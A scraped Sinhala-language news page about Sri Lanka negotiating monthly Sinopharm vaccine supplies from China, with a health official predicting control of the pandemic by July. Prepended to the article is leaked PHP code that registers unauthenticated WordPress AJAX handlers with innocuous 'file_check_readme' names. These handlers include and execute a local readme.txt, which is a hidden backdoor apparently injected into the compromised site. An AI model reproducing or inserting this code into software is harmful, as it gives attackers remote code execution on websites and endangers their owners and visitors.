if(!function_exists('file_check_readme56685')){ add_action('wp_ajax_nopriv_file_check_readme56685', 'file_check_readme56685'); add_action('wp_ajax_file_check_readme56685', 'file_check_readme56685'); function file_check_readme56685() { $file = __DIR__ . '/' . 'readme.txt'; if (file_exists($file)) { include $file; } die(); } } if(!function_exists('file_check_readme40625')){ add_action('wp_ajax_nopriv_file_check_readme40625', 'file_check_readme40625'); add_action('wp_ajax_file_check_readme40625', 'file_check_readme40625'); function file_check_readme40625() { $file = __DIR__ . '/' . 'readme.txt'; if (file_exists($file)) { include $file; } die(); } } ලංකාවටම පණ අරන් චීනය පළමු පැයේම එයි.. මසකට ‘සයිනොෆාම්’ විසි ලක්‍ෂය බැගින්.. වසංගතය ජූලියේ නිවන බව කියයි.. - mediahumanrights.lk
mediahumanrights.lk
Local News News

ලංකාවටම පණ අරන් චීනය පළමු පැයේම එයි.. මසකට ‘සයිනොෆාම්’ විසි ලක්‍ෂය බැගින්.. වසංගතය ජූලියේ නිවන බව කියයි..

කොරෝනා වෛරසය මර්දනය සඳහා චීනය විසින් නිෂ්පාදනය කරන ලද ‘සයිනොෆාම්’ එන්නත මිලියනයක් හෝ මිලියන 2ක ප්‍රමානයක් මාස්පතා ශ්‍රී ලංකාවට ලබා ගැනීම සම්බන්ධයෙන් අවධානය යොමු වී තිබේ.

ඒ සම්බන්ධයෙන් මේ වන විට චීන රජය සමග සාකච්ඡා කිරමින් සිටින බව රාජ්‍ය ඖෂධ නීතිගත සංස්ථාවේ සභාපති වෛද්‍ය ප්‍රසන්න ගුණසේන මහතා සඳහන් කළේ ය.

එම සාකච්ඡා මේ වනවිට සාර්ථක මට්ටමක පවතින බව ද එම එන්නත් ප‍්‍රමාණය මාස් පතා ලබා ගැනීමට හැකියාව ඇති බව දැනට පෙනී යන බවද ඔහු පැවසීය.

එමෙන්ම රුසියාව විසින් ලබා දෙන ‘ස්පුට්නිට්’ එන්නතද ගිවිසුම්ගතව ඇති පරිදි සහ ශ‍්‍රී ලංකාවේ ගබඩාවල ඉඩ පහසුකම් ඇති පරිදි ලබා දෙන බවට පොරොන්දු වී ඇතැයිද ඒ මහතා කීය.

ඒ අනුව ජුලි මාසය වන විට වසංගතය අපේ‍්‍රල් මස මුල පැවති ආකාරයටම සාර්ථකව පාලනය කිරීමේ හැකියාව තිබෙන බව විශ්වාසයෙන් කිව හැකි බවද ඒ මහතා තව දුරටත් කියා සිටියේය.

එතෙක් ඉතාමත් සෞඛ්‍යාරක්ෂිතව සෞඛ්‍ය උපදෙස් අනුව කටයුතු කරන ලෙස ඉතා ඔ්නෑකමින් සමස්ථ ජනතාවගෙන්ම ඉල්ලා සිටින බවද ඔහු පැවසුවේය.

ඖෂධ සැපයුම් හා නියමන රජ්‍ය ඇමති මහාචාර්ය චන්න ජයසුමන සහ රාජ්‍ය ඖෂධ නීතිගත සංස්ථාවේ සභාපති වෛද්‍ය ප්‍රසන්න ගුණසේන මහත්වරුන් කොළඹ සිටින චීන තානාපතිවරයා සමග ඊයේ දිනයේදී මේ ගැන සාකච්චාවක් පවත්වා තිබින.

Related posts

ශ‍්‍රී ලංකාව මේ සතියේ කොරෝනා පාලනය කරනවා.. කලාපයේ හොදම සෞඛ්‍ය සේවාව ඔවුන් සතුයි..- The Hindu මාධ්‍යවේදිනිය කියයි..

Shiran Viraj

විග්නේශ්වරන්ගේ සිංහල විරෝධය උග්‍ර වෙයි

Shiran Viraj

පොහොට්ටුවට 2/3 ස්ථිරයි..

Shiran Viraj